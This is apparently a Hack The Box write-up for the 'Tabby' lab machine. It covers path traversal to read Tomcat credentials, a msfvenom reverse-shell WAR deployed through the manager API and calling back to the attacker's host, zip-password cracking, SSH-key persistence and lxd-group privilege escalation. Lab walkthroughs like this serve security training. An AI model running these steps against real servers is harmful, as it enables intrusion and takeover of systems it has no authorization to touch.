Tabby - HTB
Tabby, is an easy rated box. Initial foothold gained by LFI and exploiting a webapp and privesc gained by cracking a zip file for ash and exploiting the the lxd group for root
Tabby, is an easy rated box. Initial foothold gained by LFI and exploiting a webapp and privesc gained by cracking a zip file for ash and exploiting the the lxd group for root
Recon
nmap
Start the box with a nmap scan to identify what services are running on the box, including the version of the service.
HTB/machines/Tabby [I] ➜ sudo nmap -sC -sV -Pn -o tabby.nmap 10.10.10.194 ✘130
[sudo] password for user:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-30 20:32 PDT
Nmap scan report for 10.10.10.194
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.43 seconds
From the scan we identified three services running:
- ssh
- web
- tomcat
ffuf
For this box, running ffuf is not neccessary because it doesnt provide any useful information
In order to access this vhost we need to edit the /etc/hosts file and include the following line
10.10.10.188 hms.htb
After editing the hosts file we can browse the new site.
Enumeration
tabby.htb
On the main website we are greeted with a landing page. After enumerating the landing page, we see that there is different vhost of megahosting.htb, to order to access the News tabs.
Therefore we can edit our /etc/hosts file to include the following 10.10.10.194 megahosting.htb.
Now that we can browse the new site, it is likely that the parameter is sususceptible to directory traversal. To test that theory we can use dotdotpwn to see if that is the case.
dotdotpwn on master [I] ➜ ./dotdotpwn.pl -m http-url -u http://megahosting.htb/news.php\?file\=TRAVERSAL -f /etc/passwd -k "root" [5/183]
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0.2 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# [email protected] #
# #
# by chr1x & nitr0us #
#################################################################################
[+] Report name: Reports/megahosting.htb_07-01-2020_09-46.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: megahosting.htb
[+] Protocol: http
[+] Port: 80
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Appending '/etc/passwd' to the Traversal Strings
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 5514
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[+] Replacing "TRAVERSAL" with the traversals created and sending
[*] Testing URL: http://megahosting.htb/news.php?file=../etc/passwd
[*] Testing URL: http://megahosting.htb/news.php?file=../../etc/passwd
[*] Testing URL: http://megahosting.htb/news.php?file=../../../etc/passwd
[*] Testing URL: http://megahosting.htb/news.php?file=../../../../etc/passwd <- VULNERABLE
The results confirms our theory that the parameter is vulnerable to directory traversal
tabby.htb:8080 (tomcat)
In the nmap scan, we also had another port open, 8080, that is running a default tomcat web app. However to gain manager access on tomcat, we need user credentials. But the default path on which the user credentials are supposed to reside are not readable /etc/tomcat9/tomcat-users.xml.
To overcome this challenge, we can install tomcat on a disposable docker container.
docker run -it --rm ubuntu bash
apt update && apt install tomcat9
Once that is done, we have a couple of additional location where tomcat-users.xml can reside.
- /usr/share/tomcat9/etc/tomcat-users.xml
- /var/lib/tomcat9/conf/tomcat-users.xml
We can now use dotdotpwn to explore the additonal path discovered and the /usr/share/tomcat9/etc/tomcat-users.xml is found to be accessible. Hence we can browse http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
It is worth noting that when I tried to use the browser to access that particular file it was giving me a blank page. Therefore I decided to use terminal to browse the page
HTB/machines/Tabby [I] ➜ http http://megahosting.htb/news.php\?file\=../../../../usr/share/tomcat9/etc/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
...
..
.
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
For exploiting tomcat, there exists metasploit modules but they require manager access, which we do not have. Hence we need to generate our own payload.
We can then use msfvenom to generate a the payload
HTB/machines/Tabby took 7s [I] ➜ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.160 LPORT=4455 -f war -o tomcat.war
Payload size: 1094 bytes
Final size of war file: 1094 bytes
Saved as: tomcat.war
Now that we have out payload, we can deploy it. However, we can not use the web gui since we do not have the manager-gui role, therefore we have to use api calls to deploy the payload
HTB/machines/Tabby [I] ➜ http -p b --auth tomcat:'$3cureP4s5w0rd123!' PUT tabby.htb:8080/manager/text/deploy path==/tommy update==true < tommy.war
OK - Deployed application at context path [/tommy]
After success from deploying the malicious war file, we set up a netcat listener and then browse the new webpage ending in /tommy.
HTB/machines/Tabby [I] ➜ nc -nlvp 4455
listening on [any] 4455 ...
connect to [10.10.15.160] from (UNKNOWN) [10.10.10.194] 47024
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
Privesc
ash
Now that we have a foothold in the system, we run a enumaration script such as linenum or linux smart enum to gather information.
After running lse.sh we find an interesting file
[!] fst190 Can we read any backup?......................................... yes!
---
-rw-r--r-- 1 ash ash 8716 Jun 16 13:42 /var/www/html/files/16162020_backup.zip
Unfortunately, we can extract the zip file because it is password protected but we can use john the ripper to crack the password. But before we can use john we need to use zip2john to convert the hash that is understandable by john.
machines/Tabby/files [I] ➜ zip2john 16162020_backup.zip > hash.txt
16162020_backup.zip:$pkzip2$3*2*1*0*0*24*02f9*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*285c*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5c67*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip2$::16162020_backup.zip:var/www/html/news.php, var/www/html/logo.png, var/www/html/index.php:16162020_backup.zip
Now that we have the hash, it is time to use john to crack the password
machines/Tabby/files [I] ➜ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it (16162020_backup.zip)
1g 0:00:00:01 DONE (2020-07-02 13:29) 0.7142g/s 7402Kp/s 7402Kc/s 7402KC/s adnc153..adenabuck
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We can su, switch user, as ash
tomcat@tabby:/var/lib/tomcat9$ su ash
su ash
Password: admin@it
ash@tabby:/var/lib/tomcat9$
Now that we have access as ash, we can add our own ssh key for easier access
echo <SSHKEY> >> ~/.ssh/authorized_keys
ash@tabby:~$ cat user.txt
07675d50e50e044a5770ac9c2072e617
root
Now that we have logged in as ash, we see that ash has a peculiar group added lxd.
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
After a few google searches there is an article that describes on how to abuse lxd privileges to gain root access.
By following that article, we should get the root flag.
ash@tabby:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/root
/mnt/root/root # cat root.txt
6d5a82f3736718f7bdf726402b803170
Lessons Learned
If a file is being serverd from a parameter check for LFI. Be on the look out of the groups users are in since some groups can elevate privileges